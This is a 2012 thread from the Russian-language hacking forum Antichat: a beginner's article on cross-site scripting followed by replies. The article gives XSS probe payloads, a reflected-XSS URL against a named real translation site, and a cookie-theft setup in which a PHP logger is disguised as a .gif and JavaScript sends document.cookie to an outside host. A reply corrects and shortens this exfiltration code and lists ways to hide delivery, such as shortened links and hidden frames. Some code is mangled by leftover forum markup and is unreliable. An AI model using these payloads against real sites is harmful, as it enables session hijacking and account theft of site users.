ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
09.03.2012, 15:30
|
|
Guest
Сообщений: n/a
Провел на форуме:
10816
Репутация:
74
|
|
XSS. Межсайтовый скриптинг
Моя первая статья, Автор: mr.Penguin
Вступление
XSS - тип уязвимости, позволяющий вставить произвольный JavaScript код в тело страницы сайта.
XSS расшифровывается как Cross Site Scripting. Для термина используют сокращение "XSS", чтобы не было путаницы с "CSS" (каскадные таблицы стилей - приминяются в оформлении страницы сайта).
Для чего служит?
XSS служит для атаки пользователей, просматривающих зараженную страницу.
Чаще всего, данную уязвимость используют для кражи cookies (применяется для сохранения данных на стороне юзера) у пользователя.
Виды XSS Уязвимостей
Типы уязвимостей делятся на два вида.
#1 Активная XSS.
Данный тип уязвимости хранится на сервере, и срабатывает в браузере жертвы при открытии какой-либо страницы зараженного сайта.
Чаще всего, активную XSS можно встретить в чатах/блогах/новостных лентах/комментариях.
#2 Пассивная XSS.
Пассивная XSS-атака получается при конкретном запросе к скрипту. Параметры передаются через GET и POST запросы.
В отличие от POST запроса, с GET`ом намного проще. На мой взгяд, пассивные xss - самые неудобные уязвимости для осуществления атаки на сайте.
XSS на примере
Чтобы найти пассивную XSS на сайте, достаточно подставить в форму ввода следующий код:
Если скрипт сработал и у вас вылезло окно с текстом "xss", то пассивная XSS уязвимость присутствует на сайте. Если у вас ничего не получилось, то не расстраивайтесь - можно попробовать и такой код:
Код:
Code:
">alert('xss')
Если ни один из представленных кодов не сработал, то скорее всего уязвимость отсутствует на сайте.
Рассмотрим на примере работу пассивной XSS.
Давайте зайдем на какой-нибудь сайт и найдем там поиск. Параметры передаются через GET запрос.
В форму ввода пишем
Код:
Code:
">alert('xss')
и нажимаем кнопку "Найти. В адресной строке у нас должно получится что-то вроде этого:
Код:
Code:
http://site.ru/search.php?q=">alert('xss')
Если на сайте отсутствует фильтрация HTML-тегов, то у вас должно выскочить окно с текстом "xss", если окна нет, то пассивная xss на сайте отсутствует.
Вот готовый пример пассивной XSS на Online-переводчике -
Код:
Code:
http://www.translate.ru/siteTranslation/autolink/?direction=ar&template=General&sourceURL=">alert('xss')
Использование XSS для кражи cookies пользователя
Для того, чтобы украсть cookies пользователя, нам понадобиться онлайн-сниффер. Его можно найти в интернете, но можно использовать и свой.
Нам понадобиться два файла:
1) file.php - В нем и будет находится наш снифер
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR]
2) file.txt - файл, который будет записывать все данные с нашего сниффера.
Можно поменять расширение "php" на "gif", чтобы наш скрипт не вызывал никаких подозрений. Тут нам поможет ".htaccess", в котором мы пропишем следующее:
Код:
Code:
AddType application/x-httpd-php .gif
img= new Image();
img.src="www.site.ru/ваше_название.gif?"+document.cookie
Вот и всё. По идее, в наш файл "file.txt" должны прийти кукисы пользователя.
Если у вас возникли вопросы по данной уязвимости или у вас не получается что-либо реализовать, то пишите в эту тему, я с радостью отвечу и помогу вам разобраться во всем.
Спасибо за внимание.
P.S. Не забывайте про фильтрацию HTML-тегов. Различные способы вставки JavaScript кода вы можете посмотреть здесь.
P.S2 Статья будет дополняться.
Вторая часть статьи: Проводим XSS через POST
|
|
|
|
09.03.2012, 15:46
|
|
Guest
Сообщений: n/a
Провел на форуме:
149611
Репутация:
81
|
|
Таких статей море, ничего нового =(
|
|
|
|
09.03.2012, 15:57
|
|
Guest
Сообщений: n/a
Провел на форуме:
10816
Репутация:
74
|
|
Сообщение от Osstudio
Osstudio said:
Таких статей море, ничего нового =(
Эта статья рассчитана на новичков.
Я владею достаточной информацией про данный тип уязвимости, но решил написать всего лишь представление об этой уязвимости. Именно поэтому в конце написал "Если у вас возникли вопросы по данной уязвимости или у вас не получается что-либо реализовать, то пишите в эту тему, я с радостью отвечу и помогу вам разобраться во всем.", а это значит - постараюсь ответить на вопрос пользователя и может быть, Вы или кто-то другой узнает что-то новое.
|
|
|
|
09.03.2012, 16:10
|
|
Guest
Сообщений: n/a
Провел на форуме:
102354
Репутация:
267
|
|
Регистрация: 08.03.2012
Человек, который зарегистрировался только, чтобы написать статью, поделится знаниями! Браво =)
|
|
|
|
09.03.2012, 17:47
|
|
Guest
Сообщений: n/a
Провел на форуме:
149611
Репутация:
81
|
|
Сообщение от mr.Penguin
mr.Penguin said:
Эта статья рассчитана на новичков.
Я владею достаточной информацией про данный тип уязвимости, но решил написать всего лишь представление об этой уязвимости. Именно поэтому в конце написал "Если у вас возникли вопросы по данной уязвимости или у вас не получается что-либо реализовать, то пишите в эту тему, я с радостью отвечу и помогу вам разобраться во всем.", а это значит - постараюсь ответить на вопрос пользователя и может быть, Вы или кто-то другой узнает что-то новое.
Таких статей для новичков и где люди пишут в конце "Если у вас возникли вопросы по данной уязвимости или у вас не получается что-либо реализовать, то пишите в эту тему, я с радостью отвечу и помогу вам разобраться во всем." МОРЕ! Так понятней?
|
|
|
|
09.03.2012, 20:15
|
|
Постоянный
Регистрация: 22.09.2006
Сообщений: 531
Провел на форуме:
3818187
Репутация:
369
|
|
а че ни слова не написал про обход фильрации при проведении атаки? проблема весьма актуальная. Выложил бы софт по проведению данной атаки для упрощения и автоматиизации процесса. Доведи до ума Статью если хочешь похвалы!
|
|
|
09.03.2012, 20:44
|
|
Guest
Сообщений: n/a
Провел на форуме:
290351
Репутация:
173
|
|
Сообщение от satana8920
satana8920 said:
Выложил бы софт по проведению данной атаки для упрощения и автоматиизации процесса.
Софт? какой ещё софт сам расскажи что то интересно прям стало))
|
|
|
|
09.03.2012, 21:11
|
|
Guest
Сообщений: n/a
Провел на форуме:
10816
Репутация:
74
|
|
Сообщение от Osstudio
Osstudio said:
Таких статей для новичков и где люди пишут в конце "Если у вас возникли вопросы по данной уязвимости или у вас не получается что-либо реализовать, то пишите в эту тему, я с радостью отвечу и помогу вам разобраться во всем." МОРЕ! Так понятней?
Ну вот и еще одна появилась. Я думаю, что никто не против. Пусть люди задают вопросы по XSS, глядишь и Вы что-нибудь новенькое узнаете (как я понимаю, Вы не гуру в XSS - в одной теме ваше сообщение видел).
Сообщение от satana8920
satana8920 said:
а че ни слова не написал про обход фильрации при проведении атаки? проблема весьма актуальная. Выложил бы софт по проведению данной атаки для упрощения и автоматиизации процесса. Доведи до ума Статью если хочешь похвалы!
Согласен, проблема весьма актуальная - поэтому совсем скоро начну писать вторую часть статьи, где Вы подробно сможете прочесть про фильтрацию. А насчет софта - думаю, что это лишнее. Ведь приятнее делать все своими руками.
|
|
|
|
09.03.2012, 21:18
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме:
4512
Репутация:
0
|
|
Основные замечания по статье:
XSS делятся не на два типа, а на три:
1) Активные (хранимые)
2) Пассивные (отраженные)
3) DOM-based
Указанные векторы атак не подходят для надежной проверки на XSS-уязвимость. Желательно проверять вручную на фильтрацию определенных символов (в зависимости от места вывода), чтобы не вызвать подозрения у администрации сайта. В крайнем случае, можно использовать универсальные векторы XSS (где их найти, спросите у гугла)
Кража сессии - не единственная возможность XSS (чтение данных со страниц сайта, выполнение запросов, доступ к локальному хранилищу, базам данных)
Не написано о практической эксплуатации пассивных XSS (прямой переход по ссылке, шифрование, сокращение, скрытые фреймы)
Это неправильно:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][COLOR="#0000BB"]img[/COLOR][COLOR="#007700"]= new[/COLOR][COLOR="#0000BB"]Image[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#0000BB"]img[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]src[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"www.site.ru/ваше_название.gif?"[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]document[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]cookie[/COLOR][/COLOR]
www.site.ru будет восприниматься как директория относительно текущей.
Никаких действий с объектом img в дальнейшем не производится, поэтому можно сократить код так:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"](new[/COLOR][COLOR="#0000BB"]Image[/COLOR][COLOR="#007700"]()).[/COLOR][COLOR="#0000BB"]src[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'//www.site.ru/ваше_название.gif?'[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]document[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]cookie[/COLOR][/COLOR]
или с явным указанием протокола:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"](new[/COLOR][COLOR="#0000BB"]Image[/COLOR][COLOR="#007700"]()).[/COLOR][COLOR="#0000BB"]src[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'http://www.site.ru/ваше_название.gif?'[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]document[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]cookie[/COLOR][/COLOR]
Непонятно, зачем менять расширение на .gif php-скрипту, сохраняющему куки. |
|
|
|
09.03.2012, 21:37
|
|
Guest
Сообщений: n/a
Провел на форуме:
10816
Репутация:
74
|
|
M_script, согласен. Но я решил написать о двух основных типах XSS.
Код:
Code:
Указанные векторы атак не подходят для надежной проверки на XSS-уязвимость. Желательно проверять вручную на фильтрацию определенных символов (в зависимости от места вывода), чтобы не вызвать подозрения у администрации сайта. В крайнем случае, можно использовать универсальные векторы XSS (где их найти, спросите у гугла)
И тут я полностью согласен, но я думаю, что это простительно. Все-таки первая статья
В следующий раз постараюсь написать всё внятней.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
